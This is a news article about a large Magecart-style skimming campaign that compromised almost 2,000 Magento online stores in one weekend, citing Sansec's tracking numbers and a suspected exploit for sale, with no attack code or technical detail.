Over the past few days, thousands of Magento-powered online stores have been hacked as part of a skimming operation that has been described as “the biggest ever.”
Sansec, a Dutch-based cybersecurity company that specializes in solutions designed to fight digital skimming, is tracking the attack. Sansec reported on Monday seeing almost 2,000 Magento stores that have been infiltrated as part of this effort since Friday — more than 1,000 stores were hacked on Saturday, more than 600 on Sunday, and more than 200 on Monday so far.
Most of the sites affected were controlled by Magento 1, but some worked with Magento 2.
Sansec claims this is the biggest digital effort it’s ever seen since 2015 when tracking the threat environment began.
“The previous high in July of last year was 962 compromised stores in a single day,” the firm explained in a blog post. “The vast scale of the web skimming event this weekend reflects increased complexity and profitability. Increasingly, offenders streamlined their hacking activities to execute web skimming schemes on as many shops as practicable.
The hackers have been planting a payment card skimmer on targeted websites as part of this effort, which includes what analysts have identified as a traditional Magecart-style attack. The malware is designed to steal user-entered information from a compromised store’s checkout page and exfiltrate it to a server hosted in Russia.
Sansec estimates that over the weekend tens of thousands of users were likely to have hacked their personal and financial details from the affected websites.
Although the attack is still under investigation, the cybersecurity company suspects cybercriminals might be using a new Magento vulnerability that was sold for $5,000 on a hacker website a few weeks earlier. The seller, a Russian speaker, reported that the exploit allowed remote execution of code, and said he was selling only 10 copies.
The malware allegedly attacked websites Magento 1. Magento 1 has come to an end of existence and Adobe no longer publishes updates for it, but an estimated 95,000 websites are still powered by this update, Sansec said.
